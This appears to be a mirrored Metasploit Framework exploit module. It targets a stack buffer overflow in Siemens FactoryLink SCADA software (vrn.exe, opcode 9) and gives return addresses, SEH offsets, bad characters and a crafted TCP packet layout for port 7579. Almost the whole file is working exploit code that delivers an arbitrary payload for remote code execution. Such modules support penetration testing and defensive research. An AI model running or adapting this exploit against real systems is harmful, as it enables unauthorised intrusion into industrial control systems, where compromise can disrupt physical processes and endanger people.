Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/factorylink_vrn_09.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow',
17
'Description' => %q{
18
This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,
19
and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to
20
execute arbitrary code due to the improper use of a vsprintf() function while
21
processing the user-supplied text field. Originally found and posted by
22
Luigi Auriemma.
23
},
24
'Author' => [
25
'Luigi Auriemma', # Public exploit
26
'hal', # Metasploit module
27
'MC', # SEH, badchars, etc
28
],
29
'License' => MSF_LICENSE,
30
'References' => [
31
['OSVDB', '72815'],
32
['URL', 'http://aluigi.altervista.org/adv/factorylink_4-adv.txt'],
33
['URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01']
34
],
35
'Privileged' => true,
36
'DefaultOptions' => {
37
'EXITFUNC' => 'seh',
38
},
39
'Payload' => {
40
'Space' => 550,
41
'BadChars' => "\x00\x20\x0a\x0d",
42
'StackAdjustment' => -3500,
43
},
44
'Platform' => 'win',
45
'Targets' => [
46
[ 'FactoryLink 7.5', { 'Ret' => 0x1c0106ac, 'Offset' => 994 } ],
47
[ 'FactoryLink 7.5 SP2', { 'Ret' => 0x1c01069c, 'Offset' => 994 } ],
48
[ 'FactoryLink 8.0.1.703', { 'Ret' => 0x1c01087c, 'Offset' => 998 } ],
49
],
50
'DisclosureDate' => '2011-03-21',
51
'Notes' => {
52
'Reliability' => UNKNOWN_RELIABILITY,
53
'Stability' => UNKNOWN_STABILITY,
54
'SideEffects' => UNKNOWN_SIDE_EFFECTS
55
}
56
)
57
)
58
59
register_options([Opt::RPORT(7579)])
60
end
61
62
def exploit
63
header = "\x3f" * 4
64
header << "\xff\x55"
65
header << "\x09\x00" # opcode
66
header << "\x3f\x3f\xff\xff"
67
header << "\x00\x00\x3f\x3f"
68
header << "\x01\x00"
69
header << "\x3f" * 16
70
header << "\x01\x00\x01\x00"
71
header << "\x3f\x3f"
72
73
data = rand_text_alpha_upper(65535)
74
data[448, payload.encoded.length] = payload.encoded
75
data[target['Offset'], 8] = generate_seh_record(target.ret)
76
data[1006, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-524").encode_string
77
78
print_status("Trying target #{target.name}...")
79
80
connect
81
sock.put(header + data)
82
83
handler
84
85
select(nil, nil, nil, 1)
86
disconnect
87
end
88
end
89
90